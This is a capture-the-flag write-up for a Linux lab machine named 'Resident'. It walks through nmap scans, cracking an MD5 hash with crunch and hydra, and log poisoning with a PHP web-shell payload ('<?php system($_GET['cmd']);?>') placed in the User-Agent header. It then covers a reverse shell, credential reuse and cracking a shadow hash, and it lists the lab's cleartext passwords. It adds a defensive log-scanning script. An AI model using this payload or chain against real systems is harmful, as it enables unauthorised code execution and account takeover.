Resident

| Operating system | Difficulty | Release date | Creator |
|---|---|---|---|
| Linux | Advanced | 09 October 2024 | rodgar |
Initial enumeration

We run an nmap scan to discover which TCP ports are open on the target machine.

```
nmap -sS -p- --open --min-rate 5000 -Pn -n -vvv 192.168.1.16 -oG open_ports
```

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 09:29 -03
Initiating ARP Ping Scan at 09:29
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 09:29, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:29
Scanning 192.168.1.16 [65535 ports]
Discovered open port 22/tcp on 192.168.1.16
Discovered open port 80/tcp on 192.168.1.16
Completed SYN Stealth Scan at 09:29, 2.23s elapsed (65535 total ports)
Nmap scan report for 192.168.1.16
Host is up, received arp-response (0.00024s latency).
Scanned at 2024-10-09 09:29:19 -03 for 3s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:A2:02:58 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
```
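The first scan writes grepable output (`-oG open_ports`), and the next step feeds the open ports back into a targeted `-sCV` scan. The following is an added example, not part of the original writeup, that parses that grepable format and builds the port list for the follow-up scan; the sample `.gnmap` text is constructed here to mirror the ports found above, and `SAMPLE_GNMAP`, `extract_open_ports`, `port_spec` and `followup_scan_command` are names chosen for this example.

```python
import re
from collections import defaultdict

# Constructed sample of nmap grepable (-oG) output, shaped like the first scan above.
# Each port entry has the form port/state/proto/owner/service/rpc/version/ .
SAMPLE_GNMAP = """\
# Nmap 7.94SVN scan initiated Wed Oct  9 09:29:19 2024 as: nmap -sS -p- --open --min-rate 5000 -Pn -n -vvv -oG open_ports 192.168.1.16
Host: 192.168.1.16 ()\tStatus: Up
Host: 192.168.1.16 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (65533)
# Nmap done at Wed Oct  9 09:29:21 2024 -- 1 IP address (1 host up) scanned in 2.40 seconds
"""

# Matches a "Host:" line that carries a "Ports:" section (tab-separated fields).
HOST_RE = re.compile(
    r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\s+Ports:\s+(?P<ports>[^\t]+)"
)


def extract_open_ports(gnmap_text):
    """Return {ip: [(port, proto, service), ...]} for every port nmap reported as open."""
    result = defaultdict(list)
    for line in gnmap_text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and "Status:" lines carry no port data
        for entry in m.group("ports").split(", "):
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue  # malformed entry, skip rather than guess
            port, state, proto, service = fields[0], fields[1], fields[2], fields[4]
            if state == "open":
                result[m.group("ip")].append((int(port), proto, service))
    return {ip: sorted(ports) for ip, ports in result.items()}


def port_spec(ports):
    """Comma-separated port list in the form nmap's -p option expects, e.g. "22,80"."""
    return ",".join(str(port) for port, _proto, _service in ports)


def followup_scan_command(ip, ports):
    """Build the version/script scan command used in the next step of the writeup."""
    return f"nmap -sCV -p {port_spec(ports)} -oN services_scan {ip} -vvv"


if __name__ == "__main__":
    for ip, ports in extract_open_ports(SAMPLE_GNMAP).items():
        print(ip, ports)
        print(followup_scan_command(ip, ports))
```

Only entries whose state is `open` are kept, so `--open` is not required on the first scan for the parser to produce the right list.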
We run nmap's own basic enumeration scripts to learn the version and service running behind each port.

```
nmap -sCV -p 22,80 -oN services_scan 192.168.1.16 -vvv
```

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 09:30 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Initiating ARP Ping Scan at 09:30
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 09:30, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:30
Completed Parallel DNS resolution of 1 host. at 09:30, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:30
Scanning 192.168.1.16 (192.168.1.16) [2 ports]
Discovered open port 22/tcp on 192.168.1.16
Discovered open port 80/tcp on 192.168.1.16
Completed SYN Stealth Scan at 09:30, 0.01s elapsed (2 total ports)
Initiating Service scan at 09:30
Scanning 2 services on 192.168.1.16 (192.168.1.16)
Completed Service scan at 09:30, 6.06s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.16.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.35s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Nmap scan report for 192.168.1.16 (192.168.1.16)
Host is up, received arp-response (0.00093s latency).
Scanned at 2024-10-09 09:30:43 -03 for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 e8:fc:cb:53:f8:97:01:69:27:3c:58:0c:48:b7:28:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG57NJgjMDvZrMojGo/exr2ABYNJCphm+fCZWJtQ9JPzJXV80sls23mRqVhtuNfF7dlckuPUVutpp14I+rPybW0=
| 256 fa:87:ab:ce:92:42:86:71:55:00:b1:35:96:93:1f:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGmMtRfmRHsCpbNpV+TCAlOjrevjvj2KrOsB6S4vMh+0
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Iniciar Sesi\xC3\xB3n
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
MAC Address: 08:00:27:A2:02:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```
Initial exploitation

We go to CyberChef and identify the hash: it is base64-encoded, so we decode it and then apply a URL decode. The result is a hash, but it is one character short of a valid MD5.

We use crunch to generate the combinations needed and produce the candidate hashes (the `@` placeholder at the end of the pattern is filled with each character of the given charset, so the pattern is the 32 characters crunch expects):

```
crunch 32 32 abcdef0123456789 -t 5a06153b12b2ec6210a8bb66f4e78c4@ -o hashes.txt
```

We use hydra to brute-force with that list and break the hash.

```
admin:5a06153b12b2ec6210a8bb66f4e78c4a
```
Log Poisoning

We intercept the request with Burp Suite and replace the User-Agent with `<?php system($_GET['cmd']);?>`.
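From the defender's side, the poisoned request leaves a clear trace: a PHP open tag inside a client-controlled header that Apache writes to the access log. The following is an added example, not part of the original writeup, that scans Apache combined-format log lines and reports entries whose request line, Referer or User-Agent carries a PHP tag (percent-decoding each field first, since a tag placed in the query string is logged encoded). The log lines are constructed for the example, and `SAMPLE_LOG`, `parse_combined`, `poisoned_fields` and `scan_log` are names chosen here.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache "combined" log lines (not taken from the target machine).
# Format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
SAMPLE_LOG = """\
192.168.1.10 - - [09/Oct/2024:09:35:01 -0300] "GET /index.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"
192.168.1.10 - - [09/Oct/2024:09:35:07 -0300] "GET /login.php HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']);?>"
192.168.1.10 - - [09/Oct/2024:09:35:09 -0300] "GET /index.php?q=%3C%3Fphp+echo+1%3B+%3F%3E HTTP/1.1" 200 1043 "-" "curl/8.5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP open tags: "<?php", the short echo tag "<?=" and a bare "<?" followed by whitespace.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)


def parse_combined(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def poisoned_fields(entry):
    """Names of the client-controlled fields in this entry that contain a PHP tag.

    Both the raw and the percent-decoded value are checked, so an encoded tag in
    the query string is caught as well as a literal one in a header."""
    hits = []
    for field in ("request", "referer", "ua"):
        raw = entry[field]
        if PHP_TAG_RE.search(raw) or PHP_TAG_RE.search(unquote_plus(raw)):
            hits.append(field)
    return hits


def scan_log(text):
    """Return one finding per suspicious line: its number, source IP and the tainted fields."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_combined(line)
        if entry is None:
            continue  # unparseable line: not silently treated as clean, but not reported here
        fields = poisoned_fields(entry)
        if fields:
            findings.append({"line": lineno, "ip": entry["ip"], "fields": fields})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['ip']} PHP tag in {', '.join(finding['fields'])}")
```

A hit on its own only shows that someone wrote PHP into the log; the poisoning becomes code execution when the application includes that log file through a user-controlled path, so the corresponding hardening is to never build include paths from request parameters and to keep the web server user from reading its own log directory.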
POC

We launch a reverse shell.

We upgrade the TTY to a fully interactive shell.

We read the user.txt flag.
Enumeration / lateral movement

www-data -> simple

Database credentials:

```
simple:simple
```

We try the same credentials for the user, betting on credential reuse, and the assumption turns out to be correct.
Privilege escalation

If we look inside the /home directory, we find a script that copies the password.txt file from user ram's home to /tmp. We grant execute permission to the binary and run it.

If we look inside the copied file, we find the following:

```
ram:$y$j9T$v3fiA7W1LOJmdyVZGUfIp0$TF7qqhsJ1SnWH8caDijOlxCjIo2VXgurTgq6DIlxmE1:20003:0:99999:7:::
```

We crack the hash with john and obtain the password.

We enter the credentials and we are now ram.

```
ram:fuckyou
```

We go to our home folder, where we see 3 files, and root.txt contains a password.

We try that password as root's and we are right, which completes this machine.

```
root:macbookpro
```

We read the root.txt flag.